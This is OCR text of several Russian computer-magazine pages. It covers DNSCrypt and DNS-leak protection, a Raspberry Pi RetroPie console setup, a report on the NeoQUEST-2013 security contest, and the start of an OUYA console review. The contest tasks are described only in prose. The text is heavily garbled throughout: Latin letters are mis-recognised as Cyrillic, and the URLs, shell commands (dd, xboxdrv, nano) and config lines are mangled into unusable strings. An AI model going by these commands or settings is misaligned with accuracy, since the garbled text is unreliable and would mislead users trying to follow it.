желающий, находящийся на «последней миле», 
то есть между тобой и провайдером, может по- 
лучить все имена узлов, к которым ты обраща- 
ешься. Приведенный выше вариант с подменой 
ІР-адреса совсем жестокий, но в любом случае 
есть возможность отслеживать посещенные то- 
бой узлы и использовать эту информацию в соб- 
ственных целях. 
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Если ты «боишься» своего провайдера или 
просто не хочешь, чтобы он видел, какие сайты 
ты посещаешь, можешь (разумеется, кроме ис- 
пользования ѴРЫ и других средств защиты) до- 
полнительно настроить свой компьютер на ис- 
пользование РМЗ-серверов проекта ОрепРЫЗ 
( іл/ѵуцу.ооепгіпз.сот ). На данный момент это сле- 
дующие серверы: 

• 208.67.222.222; 

* 208.67.220.220. 



При этом тебе не нужно никакое другое до- 
полнительное программное обеспечение. Про- 
сто настрой свою систему на использование этих 
Р^-серверов. 

Но все равно остается проблема перехва- 
та РМЗ-соединений. Да, ты уже обращаешь- 
ся не к РЫЗ провайдера, а к ОрепРЫЗ, но все 
еще можно перехватить пакеты и посмотреть, 
что в них. То есть при желании можно узнать, к ка- 
ким узлам ты обращался. 

Вот мы и подошли к РМЗСгурТ Эта про- 
граммулина позволяет зашифровать твое РЫ5- 
соединение. Теперь твой провайдер (и все, кто 
между тобой и им) точно не узнает, какие сайты 
ты посещаешь! Еще раз повторюсь. Эта про- 
грамма не замена Тог или ѴРІЧ, По-прежнему 
остальные передаваемые тобой данные переда- 
ются без шифрования, если ты не используешь 
ни ѴРІЧ, ни Тог. Программа шифрует только РГЧЗ- 
трафик. 



ОЫ81.ЕАК 

Сайт бНоз^/щуѵѵѵ.сіпзІеакІезТсот позволяет 
определить «утечку» РГЧ8 и объясняет, как от нее 
избавиться. Просто зайди на этот сайт. Нажав 
кнопку Сбеск Іог РІЧ5 Іеакз поѵѵ, ты получишь спи- 
сок РМЗ-серверов, через которые могут прохо- 
дить твои запросы. Следовательно, ты увидишь, 
кто именно может узнать, какие сайты ты посеща- 
ешь (рис. 2). 

Как показано на рис. 2, владельцы 12 РМ5- 
серверов имеют возможность записывать все по- 
сещенные мною сайты. Но поскольку я работаю 
через Тог, то меня этот вопрос мало беспокоит. 

На страничке Ыиу/Ісіітіс^ описано, как ис- 
править эту уязвимость {то есть что сделать, чтобы 
после подключения к ѴРІЧ твоя система использо- 
вала РІЧЗ-серверы ѴРІЧ-провайдера, а не твоего 
интернет-провайдера). Повторять все это не вижу 
смысла, поскольку любой справится с пошаговой 
последовательностью действий. 



УСТАНОВКА И ИСПОЛЬЗОВАНИЕ 
ОИЗСПУРТ 

Самый простой способ защитить свое РІЧ5- 
соединение — это использовать РІЧЗСгурТ Мож- 





Клиент 



Рис. 1 . Зашифрованное ѴРІЧ- 
с оединение (зеленая линия) 
и незашифрованное соединение 
с РМЗ-сервером провайдера 
(красная линия) 



ѴРЫ -сервер 




□N5 провайдера 




Цкѵѵз.огд.иа 



но, конечно, следовать рекомендациям от ѵаѵѵѵ. 
сіпзіеакіезісопп, а можно пойти по пути наи- 
меньшего сопротивления и просто установить 
РЫЗСгурТ 

Первым делом качаем сам РІЧЗСгурІ ( Ыірз:// 
аіІНиЬ.сот/орепсІпз/сІпзсгѵрІ-ѵуіп-сІіепІ ). Я сразу 
привел ссылку на СіІНиЬ, откуда можно скачать 
программу. Если хочешь получить о ней допол- 
нительную информацию, тогда тебе сюда: Ыі.Іѵ/ 
ѵіСХіВ . Чтобы скачать программу с СіІНиЬ, нажми 
кнопку Роѵѵпіоасі 21 Р. Будет загружен архив с ис- 
ходниками РІЧЗСгурі Уже откомпилированная 
версия находится в каталоге РМЗСгурІ: архива. 
Распакуй файлы. В принципе тебе нужен только 
один файл — сіпзсгурі-ргоху.ехе. Он находится 
в том самом каталоге. Все остальное (исходники) 
можно удалить. 

Но это еще не все. Если ты уже погуглил, то, 
значит, видел скриншоты РІЧЗСгурІ:. Запустив 
сіпзсгурі-ргоху.ехе, ты понял, что что-то не то. 
Программа запустилась в окне командной стро- 
ки. Все правильно, ты скачал сам прокси, а теперь 
еще нужно скачать к нему оболочку. На СіІНиЬ 
есть еще один проект — необходимая нам обо- 
лочка ( Ыі.Іѵ/АРхасЮ ). 

Аналогичным образом скачай 2ІР-архив, 
распакуй его куда-нибудь. В каталоге Ьіпагіез/ 
Пеіеазе/ будет программа сіпзсгурі-ѵѵіпсІіепТехе. 
Скопируй этот файл в каталог, в котором находит- 
ся файл сіпзсгурі-ргоху.ехе. 

Осталось только запустить бпзсгурі-ргоху, 
ехе. В появившемся окне выбери сетевые адап- 



теры, которые нужно защитить, и нажми кнопку 
Зіагі. Если все нормально, тогда возле кнопки 
Зіор {в нее превратится кнопка ЗіаіТ) появится 
надпись РІЧЗСгурІ із гиппіпд (рис. 3). Кстати, об- 
рати внимание, что интерфейс для ОЗ X выглядит 
несколько иначе (клиент для ОЗ X можно взять 
здесь: ЬіМѵ/гСГЧрОІ ). 

В КАЧЕСТВЕ ЗАКЛЮЧЕН ИЯ 

Статья получилась не очень большая, поскольку 
сама программа очень проста в использовании. 
Но она была бы неполной, если бы я не упомя- 
нул и о ѴРІЧ. Если ты прочитал эту статью, тебя 
она заинтересовала, но ты еще не пользуешь- 
ся услугами ѴРГЧ-провайдера для шифрова- 
ния своих данных, то самое время это сделать. 
ѴРГЧ-провайдер предоставит тебе безопасный 
туннель для передачи твоих данных, а РІЧЗСгурІ: 
обеспечит защиту РЫЗ-соединений. Конечно, 
ЗесигіІуКІЗЗ платный (бесплатный тарифный 
план можно использовать разве что для озна- 
комления), но ведь за безопасность нужно пла- 
тить? 

Можно использовать, конечно, и Тог (о кото- 
ром уже писалось в одном из предыдущих выпу- 
сков), но Тог работает относительно медленно, 
и это, как ни крути, не ѴРИ — весь трафик «та- 
рифицировать» не получится. В любом случае 
(какой бы вариант ты ни выбрал) теперь твои 
ОІЧЗ-соединения защищены. Осталось только 
определиться со средством шифрования трафи- 
ка (если ты это еще не сделал). Р-Р 
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РазрЬеггу Рі — новая рѳальност 



Превращаем малиновый микрокомпьютер 
в универсальную ретроконсоль 

До выхода пѳхідеп-консолей остался месяце лишним, и весь мир готовится к новым ВаНІеЙеІсГам 
и РІРА’м. Если тебя все это не возбуждает, у тебя есть возможность прямо сейчас приобщиться 
к вечным ценностям. Давай посмотрим, как твой РІазрЬеггу Рі поможет тебе в этом деле. 



очему именно РазрЬеггу Рі? Разумеется, ты можешь 
запустить эмулятор почти на любом устройстве. 
В большинстве случаев ты даже сможешь вывести 
картинку на большой экран и воспользоваться любым 
джойстиком. Но хочется получить все удобства работы с при- 
ставкой. Это значит: никаких клавиатур и мышей, возможность 
выполнять все, что нужно, с джойстика и высокая скорость за- 
грузки. Низкое энергопотребление и бесшумность позволяют 
держать РазрЬеггу Рі всегда включенным, так что последний 
пункт вычеркиваем. Мощности «малинки» хватит для всего, 
кроме разве что Р51 (но, уверен, это скоро изменится благо- 
даря проектам вроде Р5Х РеАРМеб). А со всем остальным нам 
на помощь придет проект РеІгоАгсЬ и его графическая над- 
стройка Етиіаііоп Зіаііоп! 

ЧТО НАМ ПОНАДОБИТСЯ 

Во многом придется повториться: очень желателен корпус (они 
сейчас доступны по 300-400 рублей), а подходящий зарядник 
у тебя почти наверняка уже есть. Наконец, понадобится ЗЭ- 
карта. Чем выше класс тем лучше, тем более что 32-гиговые 
карты 10-го класса стоят довольно мало. Также желателен ѴѴІ- 
Рі -адаптер. Я пользуюсь ТР-ІЛМК "П.ЛЛ/М725ІЧ. В отличие от ме- 
диацентра, для игровой системы качество канала не критично, 
но само подключение необходимо (зачем — мы поговорим чуть 
позже). 

ѴѴЕАРОИ ОРСНОІСЕ 

Самому важному железному компоненту я решил отвести от- 
дельную главу. Конечно же, речь пойдет о геймпаде. Какой луч- 
ше выбрать? 

За последние 10-15 лет консоли заметно изменились, и это 
отразилось на их контроллерах. В первую очередь речь идет 
о крестовине, которая сейчас остается важной только в очень 
специфичных жанрах. В старых играх же крестовина была глав- 
ным элементом. Взять хотя бы диагональные движения: стрель- 
ба «вверх-вправо» в Сопіга нужна очень часто, и тут важно четкое 
срабатывание. Кроме того, Г\Ііп1епсІо до последнего удавалось 
удерживать патент на классическую крестовину. МісгозоИ, Зопу 
и прочим приходилось изгаляться по-всякому. Насколько я по- 
нимаю, фанатам Зопу в этом смысле повезло больше — у них, 
в отличие от Місгозоіі, крестовина разделена и поэтому работа- 
ет четко. Короче говоря, покупка ЫЗВ-клона ретроконтроллера 
на Аплагоп’е в этом контексте не кажется блажью. 

Но с другой стороны, клон ЫЕЗ-контроллера точно не подой- 
дет для ЗІЧЕЗ или Зеда Медасігіѵе — у него банально не хватит 



кнопок. Забегая вперед, скажу, что нам понадобятся дополни- 
тельные клавиши на джойстике, если мы не хотим использовать 
клавиатуру для выхода из эмулятора и других дополнительных 
функций. В этом смысле прелесть контроллера от РЗЗ или ХЬох 
360 в том, что клавиш точно хватит. 

Опять-таки если у тебя уже есть игровая приставка, то на- 
верняка есть и геймпад. Завести контроллер ХЬох 360 или РЗЗ 
относительно просто. 

У фанатов Зопу в данном случае есть большой плюс — их 
джойстик универсален и может подключаться как по стан- 
дартному ВІиеІооІЬ, так и по 11513. С другой стороны, драйвер 
для РиаІЗЬоск придется качать и собирать своими руками, 
а драйвер для ХЬох доступен в родном репозитории. 

Другой плюс контроллера от ХЬох в том, что если потом за- 
хочется поиграть на РС, то у него поддержка в играх намного 
лучше, чем у ОиаІЗЬоск’а. Жирный минус в том, что контроллер 
от ХЬох 360 работает по проприетарному беспроводному про- 
токолу и разъем у него отличается от ЫЗВ. 

По себе знаю, что выбор джойстика — почти религиозный 
вопрос. Поэтому хотя с практической точки зрения удачнее 
ОиаІЗЬоск, но, если ты привык к МісгозоТІ-овскому контролле- 
ру, ты все равно сделаешь все, чтобы пользоваться им. Тут есть 
три варианта: 

1 , Купить специальный и довольно редкий беспроводной ЫЗВ- 
адаптер ѴѴігеіезз Сатіпд Ресеіѵег Тог ѴѴіпбоѵѵз РС, стоит око- 
ло 1300 рублей. 

2, Купить специальный и менее редкий ІІЗВ-провод для за- 
рядки беспроводного джойстика РІау & СЬагде Кіі Прода- 
ется в комплекте с аккумулятором, стоит около 700 рублей. 
Длина кабеля — 2,7 м. 

3, Купить проводной джойстик (около 1500 рублей). Длина ка- 
беля — все те же 2,7 м. 

В общем, если у тебя не очень большая гостиная, логичнее 
всего купить РІау & СЬагде Кіі. Все-таки в быту аккумулятор на- 
много полезнее, чем все остальное. Ну а у меня уже был прово- 
дной контроллер ХЬох, поэтому говорить буду о нем. 

РАЗВОРАЧИВАЕМ СИСТЕМУ 

Все, о чем дальше пойдет речь, стало возможным благодаря 
проекту ЯеІгоАгсЬ. Это фреймворк, объединяющий кучу эмуля- 
торов для различных систем, от ІЧЕЗ до Р5Х и 005. Благодаря 
ему нам не придется, например, отдельно настраивать управ- 
ление в каждом эмуляторе. РазрЬеггу Рі активно поддержива- 
ется, и существует специальный скрипт ( ЬІ1.Іу/18ЦІІВеР ). по- 
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Илья Илембитов 
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Можно использовать 
до четырех джойсти- 
ков, но тогда придется 
задействовать Ь$В-хаб 
с внешним питанием. 





Форматы, поддерживаемые эмуляторами ЙеІгоРіе 



При загрузке ты увидишь вот такой оплешскрин 
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зволяющий довольно просто установить его на официальный 
дистрибутив НазрЬіап. Все действительно просто, но довольно 
долго. Мы пойдем более легким путем и возьмем специаль- 
ный образ По : I I ѵ/ 1 1/МСтѵѵТ По сути это и есть стандартный 
ПазрЬіап, только с уже установленными эмуляторами. 

Скачай образ любым удобным способом и залей его на Зй- 
карту. Под ѴѴіпсІоѵѵз ты можешь использовать ѴѴіп32 Різк Ітадег 
Г)іі.Іу/У2Тег5 Т а под Ыпих и 05 X воспользуйся стандартным сісі: 



сісі іТ=Ке1:гоРіеІтаёе* о-Р=/сІеѵ/5СІХ Ьз=1М # Для _Ц.пих 
сісі і-Г=Ке~ЕгоРіеІт а%е * оТ=/сІеѵ/гсІІ5кМ Ь з-1М # Для 05 X 

Обрати внимание, что заливать нужно не в раздел, а в ко- 
рень диска (то есть /сіеѵ/зсіс, а не /беѵ/зсісі }. Макинтошникам 
стоит обратить внимание на приставку г (гсМзк вместо сіізк) — 
этот режим значительно ускоряет запись данных. 

Итак, записали диск, вставили в НазрЬеггу. Подключаем за- 
рядку, сетевой кабель и І-ЮМІ. Войдем в систему по 53Н: 

#_ Указы ва й св ой ІР. па роль - га зрЬе ггу 

з з И рі@192Л68.1.209 

Воткни ѴѴі-Рі-адаптер и контроллер. Теперь настроим ѴѴІ-Рі 
самым простым способом. 

зисіо папо /ѳіс/пе'Ыогк/іпіег-Расез 

аиір Іо 

іРасе Іо іпеі ІоорЬаск 
іРасе еіЬ0 іпеі: сІИср 




ІѴАКШЫС 



Выставлять очень вы- 
сокие значения частоты 
процессора не реко- 
мендуется — это может 
привести к нарушению 
целостности данных 
на карте. Кроме того, 
в Етіііаііоп Зіаііоп могут 
быть лаги. 



а11ои-Но1р1и§ ѵДапѲ 
аиіо мІапѲ 

ііасе мІапѲ іпеі: сІЬср 

ира-ззісі " з зісі " # Имя твоей сети 

ц ра-рзк "раззыогсі" _#_ Пароль к сети 

А теперь займемся настройкой геймпада ХЬох: 

зисіо арі- § еі ирсіаіе 

зисіо арі-^еі іпзіаіі хЬохсігѵ 

зисіо папо /еіс/гсЛосаІ 

хЬохсігѵ --ігіееег-аз-ЬиіТо п — ісі 0 — ІесІ 2 <-■ 

--сіеасігопе 4000 --БІІепі & 5Іеер_1 

хЬохсігѵ -~1:піееег-а5-Ьи1:1:оп --ісі 1 -- ІесІ 3 «-» 

--сіеасігопе 4000 --зііепі & зіеер 1 

хЬохсіг ѵ --Т під^ ег-а з-Ьи1:1:о п -- ісі 2 --ІесІ 4 *-> 

--сіеасігопе 4000 --зііепі & зіеер 1 
хЬохсігѵ - -ігіёёег-а5-Ьиііоп --ісі 3 --ІесІ 5 — 
--сіеасігопе 4000 --зііепі: & БІеер 1 

Обрати внимание на опцию —ісі. Для беспроводного джойстика 
нужно использовать —ѵѵісі. 

Теперь зайдем в настройки самого РІазрЬеггу: 

зисіо газрі-сопб^ 

По умолчанию системе не доступно все дисковое про- 
странство. Для того чтобы это изменить, выбери пункт Ехрапб 
Рііезузіет. Во-вторых, можно поиграться с настройками про- 
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изводительности. Тут стоит поэкспериментировать, единого 
варианта нет. Я не трогал частоту процессора (пункт Оѵегсіоск), 
но менял распределение памяти между оперативной и гра- 
фической (АРѵапееОІ — > Метогу Зрііі) на 256/256. После того 
как ты закончишь с настройками, система предложит тебе 
перезагрузиться. Согласись. При перезагрузке можешь выдер- 
нуть сетевой кабель — подхватится ѴѴі-Рі. 

Если все пошло как надо, то после загрузки на твоем гейм- 
паде кружок вокруг X перестанет мигать и засветится первый 
сегмент. Это значит, что джойстик определился как первый 
в системе. При первом запуске Етиіаііоп Зіаііоп предложит 
тебе настроить управление на джойстике, тут все довольно 
прозрачно. 

Итак, ты в главном меню. Переключение между эмулято- 
рами происходит по нажатию стрелок вправо-влево. Сначала 
ты можешь прийти в ступор — почему доступен только Роопл, 
Эике ІЧикет, ЭОЗ, Арріе II и Зеда? Дело в том, что большинство 
эмуляторов будут доступны только тогда, когда в их папках по- 
явятся файлы ромов. И вот сейчас ты поймешь, зачем был ну- 
жен ѴѴі-Рі! 

На своей основной системе подключись к РТР-серверу 
с ІР-адресом твоей «малинки» (на всякий случай: после пере- 
хода на ѴѴі-Рі он точно будет другой). Здесь ты увидишь акку- 
ратную структуру папок с именами систем. Учти, что каждый 
эмулятор поддерживает вполне конкретный набор форма- 
тов. На прошлом развороте я привел табличку для основных 
эмуляторов, а полный список ты найдешь в файле /йоте/рі/. 
етиіаііопзіаііоп/еззузіетз.сід. В общем, главный момент — 
в большинстве случаев не нужно заливать ромсеты из 2ІР- 
файлов. Потратишь кучу времени, а потом еще будешь сильно 
и неприятно удивлен. 

После того как ты залил нужный РОМ, нужно обновить 
Етиіаііоп Зіаііоп. Для этого на геймпаде (при стандартной 
конфигурации) нужно нажать ЗіаП и выбрать Неіоасі. Вуаля — 
соответствующий эмулятор активировался и ему видны твои 
ромы. 

Но не спеши загружаться. По умолчанию Етиіаііоп Зіаііоп 
не позволяет выходить из эмулятора в основное меню с гейм- 
пада, И тут начинается самый интересный момент — ручная на- 
стройка кнопок джойстика. 

Подключайся по ЗЗН, набирай: 

зисіо папо ~/КеІгоРіе/соп^§5/а11/ге*гоагсН.с-Р§ 

Добавь в конец файла 




ШРО 

Если не настроить кноп- 
ку выхода, то покидать 
эмулятор придется 
с помощью ребута. 
Из-за частых переза- 
грузок запросто может 
нарушиться целостность 
карты, и придется заново 
заливать образ. 
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У ПеІгоРіе есть свой от- 
дельный конфигуратор: 

ссі -/РеТгоРіе-БеТир/ 
зисіо . /геі:горіе_ 
зеТир , 



заѵебіесіігесбогу = /йоте/рі/Ке -ЬгоРіе/5аѵе5І:а±е 

за ѵеаѣа ^е сі ігесѣ ог у - / Иоте/рі/КебгоРіе/«-‘ 

заѵезТаІе 

5сгееп5Йоі:_сІігесбопу = /йоте/рі/КеІгоРіе/*^ 

Бсгеепзйобз 

аиТ05аѵе_іпТегѵа1 = 300 

іприТ_ехіТ_еггш1аТог_ахіз = -5 

іпри'Е_5аѵе_5'Еа1:е_а хі5 = +4 

іприб Іо асІ 5 - Ьа , Ье_ахІ5 = -4 

іпри1:_5сгееп5Й0І:_ахі5 = +5 

Итак, с помощью крестовины ты сможешь выходить из эму- 
лятора, делать сохранение (вправо), загружать сохранение 
(влево), делать скриншот (вниз). Еще можно подстраховаться, 
для этого вставь перед іприІ_ехіІетиІаІогахіз строчку: 

іпри1:_епаЫе_йо1:кеу_Ьбп - 10 

Теперь перед каждым действием, назначенным после 
этой строчки, нужно будет зажать большой X. На всякий слу- 
чай я приложил схему кнопок с точки зрения конфига. Каждый 
элемент имеет суффикс (Ып или ахіз) и номер (5, 10 или +4 
для стрелок/джойстиков). Чтобы сохранения и скриншоты за- 
работали, не забудь создать папки: 

біісіо тксііг /йоте/КеІгоРіе/{5аѵе5і:а1е, зсгеепзйоІБ} 

После того как ты закончил все это править, не забудь снова 
перегрузить эмулятор. На самом деле настроек намного боль- 
ше. Как минимум есть еще ускоренный режим: іприІ_ІоддІе_ 
1азІ_1ог\л/агсІ назначает клавишу, переключающую его при на- 
жатии, іприійоісііазііогѵѵагсі — при удержании. В интернете 
можно ознакомиться с полным списком опций ( оіІ.Іѵ/14ГМРсТ ). 

НАВОДИМ КРАСОТУ 

Итак, остались мелочи. Во-первых, можно отключить ненужные 
эмуляторы. Для этого полность закомментируй их секции фай- 
ле в/йоте/рі/.етиіаііопзіаііоп/ез зузіетз.сід, Заодно можешь 
закомментить и секцию Іприі Сопігоі — все равно для любой ре- 
ально задачи тебе придется лезть в конфиг. 

Во-вторых, в поставке ПеІгоРіе есть скрипт, который автома- 
тически ищет обложки к играм. Для этого запусти: 

біісіо руійоп ~/КебгоРіе/5ирр1етепбагу/Е5-5сгарегЛ-‘ 
зсгарег.ру -сгс 



іпри1:_ехі1;_еггш1а1:оп_ахІ5 = -5 

Это позволит тебе выходить из эмулятора при нажатии 
«вверх» на крестовине. Но можно сделать еще круче! 



Отсюда ты можешь 
обновить эмуляторы 
и поковыряться в раз- 
личных опциях. 



Опция сгс позволит искать не по названиям, а по сигнатурам 
файлов. Понятно, что это более длинный процесс, но зато это 
проще, чем вручную называть файлы так, чтобы понял скрипт. 
Вот, пожалуй, и все. □С 



ВНИМАНИЕ: МЫ ИЩЕМ НОВЫХ АВТОРОВ! 

ЕСЛ И ТЕБЕ ЕСТЬ ЧТО СКАЗАТЬ, ТЫ МОЖЕШЬ ВОЙТИ В КОМАНДУ ЛЮБИМОГО ЖУРНАЛА. 

ВСЕ ОЧЕНЬ ПРОСТО: 
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Во время легендарных Петербургских белых ночей в знаменитом своими 
прекрасными фонтанами Петродворце прошел финал Ыео<ЗІІЕ5Т-2013 - 
ежегодного соревнования по кибербезопасности, проводимого компанией 
НеоБИТ. Мероприятие прошло в рамках 22-ой научно-технической конференции 
«Методы и технические средства обеспечения безопасности информации». 
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Как прошел финал конкурса ШоОІГЕЗТ-гоіз 

В финале победители февральского отборочного тура 
Мео<ЗІІЕЗТ-2013 боролись за главный приз — поездку на одну 
из международных конференций. Победителем стал один 
из лучших участников хак-квестов России Виктор Алюшин 
(АѴісІог), который выбрал поездку на конференцию В5А 
в Амстердам. 




ШРО 

Логотип кафедры инфор- 
мационной безопасности 
компьютерных систем Санкт- 
Петербургского политехниче- 
ского университета 



ПУТЬ К ПОБЕДЕ 

Легенда квеста была поистине захватывающей — 
участникам нужно было совершить побег из тюрь- 
мы, уложившись в какие-то восемь часов, иначе 
их ждала казнь на вполне себе правдоподобном 
электрическом стуле. Квест был пройден далеко 
не всеми, но не переживайте, никто из участников 
не пострадал. 

В первом задании участники сражались 
с грозным противником — гипервизором. Им 
нужно было достать ключ из программы, проде- 
монстрировав свои навыки геѵегзе епдіпеегіпд. 

Во втором задании предлагалось преодолеть 
двухфакторную аутентификацию, перепрошив 
МІРАПЕ-карточку, реализовав ВІіпсІ50І_ и Х35 
в сочетании с социнженерией и преодолев си- 
стему распознавания образов. 

Самым сложным оказалось третье задание, 
в котором нужно было получить доступ к серверу 
пожарной сигнализации «тюрьмы», продемон- 
стрировав знания стандартных криптографиче- 
ских протоколов и специфических криптоатак. 

В четвертом задании требовалось обойти 
аутентификацию с ІІЗВ-ключом, запрограмми- 
ровав на контроллере Агсіиіпо сверхоптимизиро- 
ванный по памяти алгоритм умножения матриц. 

В пятом задании участникам предстояло «уг- 
нать» ботнет: изначально каждому конкурсанту 
предоставлялся один бот, анализируя алгорит- 
мы работы которого нужно было собрать ключи 
от всех остальных ботов сети. 



ТЕЛЕВИЗОР-ШПИОН, ИЛИ ОПАСНОСТИ 
ИСПОЛЬЗОВАНИЯ РИСОВАРОК 

Пока хакеры пытались сбежать из тюрьмы, зри- 
тели не только наблюдали за ними, но и слушали 
интересные доклады, подготовленные экспер- 
тами по кибербезопасности компании НеоБИТ. 
Кроме того, специально для ЫеоОЫЕЗТ высту- 
пления подготовили студенты отделения кибер- 
безопасности Санкт-петербургского политеха, 
в очередной раз продемонстрировав традицион- 
но высокий уровень подготовки студентов и вы- 
пускников кафедры ИБКС, чьи статьи, кстати, 
можно встретить практически в каждом номере 
«Хакера». 

Доклад с таинственным названием «Крото- 
вые норы в компьютерных джунглях: пентест 
масштабных информационных систем» раскрыл 
специфику проведения пентестов информацион- 
ных систем национального масштаба. 

Киберугрозу с неожиданной стороны показал 
увлекательный доклад «Атаки на современную 
бытовую технику: телевизор-шпион и опасности 
использования рисоварок». При этом проводи- 
лась живая демонстрация удаленного перехвата 
управления телевизором, в которой мог участво- 
вать любой желающий. 

Доклад «Выявление скрытых гипервизоров 
с помощью анализа влияния аппаратной вирту- 
ализации на работу кеша процессора» познако- 
мил слушателей с оригинальным методом выяв- 
ления гипервизора. 



Доклад «Использование аппаратной вир- 
туализации для мониторинга работы системы 
с внешними устройствами» стал «изюминкой» 
для любителей низкоуровневого программи- 
рования, благодаря возможности изучить опыт 
создания гипервизора, контролирующего работу 
клавиатуры, мыши, оперативной памяти. 

Гости, жаждущие не только зрелищ, но и хле- 
ба, угощались апельсиновым соком с булочками, 
боролись за рисоварку, «взламывая» телеви- 
зор, а между делом угоняли друг у друга радио- 
управляемый танк, пытаясь сфотографировать 
его камерой элегантные ножки ведущей в самом 
удачном ракурсе. В итоге танк достался самому 
умелому хакеру, сделавшему лучший снимок! 

ТО ВЕ СОЫТІЫЦЕО... 

Мы хотим сделать ЫеоОІІЕЗТ-2014 еще инте- 
реснее и отразить стремительную динамику 
возникновения новых задач кибербезопасности 
не на словах, а продемонстрировав их в реале 
на специально развернутых стендах, чтобы зри- 
тели могли все пощупать собственными руками. 
Задания ЫеоОІІЕЗТ-2014 затронут как фунда- 
ментальные, так и самые актуальные и нетри- 
виальные проблемы кибербезопасности, а его 
участники продемонстрируют, что они запросто 
могут справиться с абсолютно любыми трудно- 
стями! 

Организаторы ждут всех на ЫеоОІІЕЗТ-2014! 
Следите за объявлениями на пеоаиезі.ги . НС 





Влад Росков (второе место) и Виктор Алюшин (первое место) 



Тот самый доклад об ужасах телевизоров и рисоварок 
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Игровая консоль для настоящих гиков 



В прошлом году Джулия Урман запустила кампанию по сбору средств на раз- 
работку игровой консоли, основанной на чипе КІѴЮІАТедга 3 и операционной 
системе АпбгоісІ. Нужная сумма в размере 950 тысяч долларов была получена 
всего за восемь часов, а за все время существования кампании разработчики 
собрали 8,5 миллиона долларов, став одними из самых успешных на Кіскзіагіег 
Несколько месяцев назад ОЦУА поступила в продажу, и теперь мы можем оце- 
нить, стоила ли овчинка выделки. 



ФЕНОМЕН ОІІУА 

С самого момента своего появления на Кіскзіагіег проект ОІ/УА 
выглядел очень противоречиво. Игровая консоль, основан- 
ная на мобильном чипе с мобильной операционной системой 
на борту, хоть и должна была стоить всего 99 долларов, но вы- 
глядела странно на фоне своих больших собратьев в лице РЗЗ 
и ХЬох 360. Маленькая коробочка, оснащенная 500-мегагерцо- 
вым видеочипом, просто не могла составить им конкуренцию, 
из-за чего смысл существования консоли казался вовсе не оче- 
видным. 

Суть и прелесть ОЦУА можно было оценить, лишь внима- 
тельно прочитав довольно длинное описание проекта. В нем, 
в частности, было много слов об открытости, свободной си- 
стеме распространения игр, независимости от издателей и так 
далее. По сути, авторы проекта предлагали продукт, реально 
созданный для пользователей и разработчиков игр, а не оче- 
редную черную коробку, в которой ничего нельзя изменить. 

В этом смысле ОІІУА была чем-то совершенно новым и све- 
жим. Она была привлекательна для всех. Игроки получали до- 
ступ к онлайн-репозиторию игр, каждую из которых можно 
опробовать абсолютно бесплатно, а в случае чего скопировать 
уже имеющуюся на смартфоне игру в приставку. Независимые 
разработчики получали бесплатную площадку для распро- 
странения своих творений, пусть даже самых концептуальных 
и странных, а гики и все, кто любит поковыряться в железе, — 
открытую систему, причем настолько, что не просто можно за- 
менить или модифицировать прошивку без потери гарантии, 
а приставку в буквальном смысле можно воссоздать, скачав 
из Сети схемы для ЗО-принтера. 

Все это сделало ОЦУА чрезвычайно популярным проектом, 
которому пророчили не просто большое будущее, но чуть ли 
не революцию в мире домашних мульти медиасистем. И вот 25 
июня первая партия консоли поступила в продажу. Но действи- 
тельно ли она так революционна и открыта? Попробуем разо- 
браться. 

ПОКУПКА И ПЕРВЫЕ ВПЕЧАТЛЕНИЯ 

В обычном магазине купить ОЦУА нельзя. И дело тут вовсе 
не в России, а в самой модели распространения консоли, 
которая предполагает продажу только через сайт оиуа.іѵ, 
Атагоп и еще несколько порталов. Я сделал предзаказ ОЦУА 
еще в феврале на официальном сайте, заплатив за саму при- 
ставку 99 долларов плюс 20 за доставку, что, кстати, весьма 
экономно. За дополнительные 50 баксов можно было заказать 
также второй контроллер, но в нем просто не было необходи- 
мости. 

В местное почтовое отделение консоль пришла только в на- 
чале августа («Почта России», как всегда, на высоте). Сама при- 
ставка была спрятана в небольшой черной картонной коробке, 
в которой также находилась большая пластиковая табличка 
с надписью белым по красному «Спасибо за то, что верили» 
{Тйапк уои Іог Ьеііеѵіпд), намекающая то ли на поддержку кам- 
пании на КіскзІаПег, то ли на предзаказ. 



Кроме таблички, в коробке также находилась сама консоль 
размером с кубик Рубика, контроллер, И ОМЬ кабель, кабель 
питания, две батарейки РигасеІІ для контроллера и простень- 
кое руководство пользователя. Консоль оказалась просто се- 
рым кубом со скругленными снизу углами, кнопкой включения 
сверху, разными портами сбоку и отверстиями для вентиляции 
снизу (внутри кубика есть вентилятор, а сама она стоит на не- 
больших ножках, так что воздух спокойно проходит в щель). 

Сбоку располагаются порты для кабеля питания, НОМІ, ЦЗВ 
2.0, тісгоЦЗВ и порт Еііпегпеі для тех, у кого нет точки досту- 
па ѴѴі-Рі. Физически все эти порты размещены на одной плате 
с вентилятором, которую легко извлечь из куба, открутив че- 
тыре болта сверху, и поместить в любой другой корпус, как это 
делают некоторые энтузиасты. Таким же образом можно поме- 
нять вентилятор, если штатный выйдет из строя. 

Контроллер на первый взгляд здесь вполне стандартный. 
Обычный «рогатый» джойстик с крестовиной, четырьмя кноп- 
ками, двумя аналоговыми стиками, четырьмя клавишами 
на верхнем торце и кнопкой включения посередине (которая од- 
новременно служит и для перехода на главный экран, и для от- 
крытия меню в играх и приложениях). Батарейки находятся 
в «рогах», по одной на каждый, благодаря чему джойстик пра- 
вильно уравновешен и очень удобно лежит в руках. Заглушки, 
которые открывают доступ к батарейкам, крепятся на магнитах, 
а не на пластиковых крючках, поэтому при замене можно не бо- 
яться что-нибудь сломать. В центральной черной части распо- 
лагается небольшой тачпад, который тут явно сделан для со- 
вместимости с АпбгоісІ-приложениями; стандартный интерфейс 
и родные игры полностью управляются крестовиной и стиком. 

Подключить консоль очень просто: кабель питания — в при- 
ставку, НйМІ-кабель — в телевизор, далее кнопка включения 
сверху. 

ПЕРВОЕ ВКЛЮЧЕНИЕ И МЕСТНЫЙ АЙОВОЮ 

Первое, что ВИДИШЬ после включения КОНСОЛИ, — это инструк- 
ция по подключению джойстика, которая состоит всего из двух 
пунктов: нажать кнопку включения и удерживать кнопку «и», 
пока не загорится левый светодиод. Так происходит ВІиеФоФ- 
пайринг, длительность которого не дольше секунды. Затем 
ОЦУА предлагает подключиться к ѴѴі-Рі -сети, для чего достаточ- 
но выбрать нужный 55Ю из списка и ввести пароль. Печатать 
его придется на местной клавиатуре, передвигая курсор с по- 
мощью стика или крестовины. Утомительно, но терпимо. 
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Евгений Зобнин 

ЭПСпОІСІБІГбѲІ.ГШІ 



АППАРАТНАЯ 

НАЧИНКА 

5оС: РІѴЮІА Тедга 3 
ТЗЗ-Р-АЗ 

Процессор: ОиасІ- 

